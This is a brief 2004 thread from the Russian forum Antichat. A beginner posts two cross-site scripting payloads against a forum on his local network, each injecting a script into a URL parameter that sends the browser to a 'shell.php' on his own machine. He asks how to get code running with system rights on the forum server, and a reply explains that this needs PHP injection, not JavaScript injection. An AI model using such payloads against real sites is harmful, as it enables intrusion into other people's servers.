Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Межсайтовый вызов скрипта (https://forum.antichat.xyz/showthread.php?t=3300)

ProTeuS 26.11.2004 05:00

Межсайтовый вызов скрипта
 
Хай, пиплс!
Помогите нубу разобраться...

Пытаюсь удаленно обращаться с форума в локалке на скрипт на своей та4ке и хз 4е не выходит =(


http://10.8.1.207/showforum.php?fid="><script>location.href="http://10.8.1.119/shell.php"</script>
или
http://10.8.1.207/showforum.php?fid="><script>window.open("http://10.8.1.119/shell.php")</script>

Может я в 4ем-то не врубаюсь, но этот код выполняется с правами клиента в моем браузере, а как замутить, 4тобы он исполнялся с правами системы на машине форума???

Algol 26.11.2004 18:14

[QUOTE]
Цитата:

как замутить, 4тобы он исполнялся с правами системы на машине форума
В данном случае никак, поскольку ты описываешь javascript-injection, а тебе нужно php-injection.

ProTeuS 27.11.2004 03:24

[QUOTE=Algol]
Цитата:

В данном случае никак, поскольку ты описываешь javascript-injection, а тебе нужно php-injection.
Сенкс, теперь более-менее разобрался...


Время: 22:54